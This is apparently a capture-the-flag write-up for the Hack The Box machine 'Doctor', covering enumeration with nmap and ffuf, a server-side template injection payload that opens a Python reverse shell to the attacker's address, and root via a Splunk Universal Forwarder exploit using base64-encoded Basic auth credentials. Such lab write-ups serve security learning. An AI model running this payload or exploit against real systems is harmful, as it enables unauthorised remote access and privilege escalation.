Port Scanning and general enumeration (Nmap, FFuF)
8089 port for
Splunkd. Doing some reasearch I found out that this port is for the Splunk Universal Forwarder. Let’s keep this in mind for later.
Standard enumeration of the site on port
80 doesn’t reveal anything great, but there is an interesting thing to note
doctors.htb.. let’s update our
/etc/hosts file and point
New things to play with! Let’s toss ffuf at this while we poke around
ffuf -u doctors.htb/FUZZ -w /path/to/wordlist -c
Let’s create an account and see what this app is all about.
Testing different payloads for different exploits gave us nothing in return at first glance. But if we go back and check the
archive endpoint and check the source we see something interesting..
Ah! Vulnerable to SSTI!
Access (SSTI, reverse shell)
I actually covered this in a writeup for a CTF Challenge from Hacktivitycon2020 called Template Shack. This time, though, instead of using slicing to find where
subprocess.Popen is, we’ll use this handy payload I found on PayloadAllTheThings
After editing it a bit so that it makes a call back to our machine:
.builtins'import'.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh", "-i"]);'").read()
We can use that as our
title, whatever you want for the body and make the post.
Fire up a listener on your box and reload the
Privesc (linPEAS, Spelunker)
So now we have a shell on the box. Let’s see what linPEAS says.
Interesting log file entry
Doesn’t look like an email. Maybe the
shaun user’s password? Turns out that it is. Strange.
Let’s take a look at port
8089 again. As I mentioned earlier, it’s for the Splunk Universal Forwarder. There’s some exploits floating around for it, including a local privilege escalation that we’re going to use.
First, we need to update the
Spelunker script, because the script assumes that the creds are
This is what we need to change:
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Authorization: Basic c2hhdW46R3VpdGFyMTIz
Get the script on to the box, give it the
x flag and run it.
Follow the instructions to root!